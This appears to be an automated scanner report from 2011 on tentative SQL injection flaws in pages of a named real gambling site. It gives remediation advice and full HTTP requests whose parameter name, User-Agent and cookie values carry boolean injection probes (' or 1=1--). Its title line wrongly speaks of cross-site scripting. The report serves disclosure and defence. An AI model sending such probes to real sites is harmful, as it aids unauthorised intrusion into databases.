XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05162011-01

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. https://scratch.betsson.com/en/Casino/Disco-Keno [name of an arbitrarily supplied request parameter] next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://scratch.betsson.com
Path:	/en/Casino/Disco-Keno

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /en/Casino/Disco-Keno?1%20and%201%3d1--%20=1 HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:10 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:10 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:10 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:10 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:10 GMT
Connection: close
Content-Length: 102704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Classic/Golden-Fortune">Try Golden Fortune now... the maximum Jackpot is 200,000 GBP!</a> </span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Casino" />
<meta name="WT.cg_s" content="Startpage_Casino" />



<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="inactiveViewBtnOuter" onclick="ToggleGameView('sports','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="inactiveViewBtnOuter" onclick="ToggleGameView('fantasy','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="activeViewBtnOuter" oncli
...[SNIP]...

Request 2

GET /en/Casino/Disco-Keno?1%20and%201%3d2--%20=1 HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:10 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:10 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:10 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:10 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:10 GMT
Connection: close
Content-Length: 102694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Sports/Goal-Kick">Calling all football fans...Goal Kick - ..200,000 Jackpot!</a></span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Casino" />
<meta name="WT.cg_s" content="Startpage_Casino" />



<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="inactiveViewBtnOuter" onclick="ToggleGameView('sports','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="inactiveViewBtnOuter" onclick="ToggleGameView('fantasy','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="activeViewBtnOuter" onclick="Toggle
...[SNIP]...

1.2. https://scratch.betsson.com/en/Fantasy/The-Lost-Maya [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://scratch.betsson.com
Path:	/en/Fantasy/The-Lost-Maya

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /en/Fantasy/The-Lost-Maya HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'%20and%201%3d1--%20
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:44 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:44 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:44 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:44 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:44 GMT
Connection: close
Content-Length: 102708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Classic/3-Wow">Win the dream salary with 3 wow - ...5,500 per month for 15 years!</a></span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Fantasy" />
<meta name="WT.cg_s" content="Startpage_Fantasy" />



<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="inactiveViewBtnOuter" onclick="ToggleGameView('sports','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="activeViewBtnOuter" onclick="ToggleGameView('fantasy','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="inactiveViewBtnOuter" oncl
...[SNIP]...

Request 2

GET /en/Fantasy/The-Lost-Maya HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'%20and%201%3d2--%20
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:45 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:45 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:45 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:45 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:44 GMT
Connection: close
Content-Length: 102695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Casino/Slot-Super-7">Try our classic Slot Scratch card, Super 7 now!</a></span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Fantasy" />
<meta name="WT.cg_s" content="Startpage_Fantasy" />



<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="inactiveViewBtnOuter" onclick="ToggleGameView('sports','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="activeViewBtnOuter" onclick="ToggleGameView('fantasy','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="inactiveViewBtnOuter" onclick="ToggleGa
...[SNIP]...

1.3. https://scratch.betsson.com/en/Slots/Fantasia [site cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://scratch.betsson.com
Path:	/en/Slots/Fantasia

Issue detail

The site cookie appears to be vulnerable to SQL injection attacks. The payloads 52785076'%20or%201%3d1--%20 and 52785076'%20or%201%3d2--%20 were each submitted in the site cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /en/Slots/Fantasia HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en52785076'%20or%201%3d1--%20; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:03 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:03 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:03 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:03 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:03 GMT
Connection: close
Content-Length: 102695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Classic/Golden-Fortune">Try Golden Fortune now... the maximum Jackpot is 200,000 GBP!</a> </span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Slots" />
<meta name="WT.cg_s" content="Startpage_Slots" />



<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="inactiveViewBtnOuter" onclick="ToggleGameView('sports','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="inactiveViewBtnOuter" onclick="ToggleGameView('fantasy','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="inactiveViewBtnOuter" onclick="ToggleGam
...[SNIP]...

Request 2

GET /en/Slots/Fantasia HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en52785076'%20or%201%3d2--%20; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:05 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:05 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:05 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:05 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:05 GMT
Connection: close
Content-Length: 102677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Classic/7th-Heaven">Let seven be your lucky number, play 7th Heaven!</a></span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Slots" />
<meta name="WT.cg_s" content="Startpage_Slots" />



<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="inactiveViewBtnOuter" onclick="ToggleGameView('sports','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="inactiveViewBtnOuter" onclick="ToggleGameView('fantasy','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="inactiveViewBtnOuter" onclick="ToggleGameView('casino','Sl
...[SNIP]...

1.4. https://scratch.betsson.com/en/Sports/Bowling [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://scratch.betsson.com
Path:	/en/Sports/Bowling

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads 17123380'%20or%201%3d1--%20 and 17123380'%20or%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /en/Sports/Bowling HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)17123380'%20or%201%3d1--%20
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:11 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:11 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:11 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:11 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:52:10 GMT
Connection: close
Content-Length: 102693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Classic/7th-Heaven">Let seven be your lucky number, play 7th Heaven!</a></span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Sports" />
<meta name="WT.cg_s" content="Startpage_Sports" />



<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="activeViewBtnOuter" onclick="ToggleGameView('sports','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="inactiveViewBtnOuter" onclick="ToggleGameView('fantasy','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="inactiveViewBtnOuter" onclick="ToggleGameView('casino
...[SNIP]...

Request 2

GET /en/Sports/Bowling HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)17123380'%20or%201%3d2--%20
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:12 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:12 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:12 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:12 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:52:12 GMT
Connection: close
Content-Length: 102706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Classic/3-Wow">Win the dream salary with 3 wow - ...5,500 per month for 15 years!</a></span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Sports" />
<meta name="WT.cg_s" content="Startpage_Sports" />



<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="activeViewBtnOuter" onclick="ToggleGameView('sports','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="inactiveViewBtnOuter" onclick="ToggleGameView('fantasy','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="inactiveViewBtnOuter" onclick="ToggleGam
...[SNIP]...

